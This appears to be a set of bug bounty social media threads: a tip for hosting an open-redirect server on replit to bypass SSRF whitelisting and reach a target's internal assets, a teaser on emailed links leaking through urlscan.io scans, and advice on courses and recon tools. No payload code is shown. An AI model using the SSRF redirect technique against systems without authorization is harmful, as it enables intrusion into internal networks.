Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report.
Spinning up a server to host a redirection header is time consuming and not-so-fun to do.
There's an easy alternative 🧵
While exploring some options online I've came across replit.com, their product offers a pretty easy way to just spin up a server with whatever technologies you'd like, and control the files and source code of your application.
Then on the top right corner we'll have our constructed URL to test our payload on the target, should be something like *.repl.co
So in a matter of ~2 minutes - we have our own DNS name with a redirection payload that we can point directly to internal assets of our target, cool!
After testing our payload on our injection point,
We can observe the interactive console on the bottom right of the page, and debug the information to wether we managed to successfully increase our SSRF Impact and to determine that everything is set up correctly.
This is mostly useful for SSRF endpoints with heavy whitelisting / regex mitigations, if the SSRF will follow redirects, that could open a whole new aspect for numerous of chains to bypass those.
It helped me to successfully hit internal assets at the H1-407 Live Hacking Event.
TLDR:
Hosting a redirection machine for whitelisting bypass scenarios should take no longer than 2 minutes
1. Create repl.it server with any technology 2. Edit the source code 3. Use the constructed DNS Payload on your target 4. Debug 5. Win
I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims.
Curious how this happens? 👇
#BugBounty
Major organizations globally use various tools to enhance their email security.
Two common approaches are passive and active detection of potential malware within incoming emails.
One popular tool for "sandboxed" evaluation of a link's legitimacy is .
Security vendors around the world use it, often under the hood within their own very expensive products. urlscan.io
Should you buy a "Comprehensive Bug Bounty course"? There are definitely some good courses out there.
that said I wouldn't get any course from a personal without a clear proof on BB/PWN reputation.
and if you want to start and do it the right way, jump on this book as a start.
Think of buying a subscription to an online recon framework with a nice GUI? there are a few providers out there, It can be a good start for new comers, but in no means it should cost more than ~20$ a month.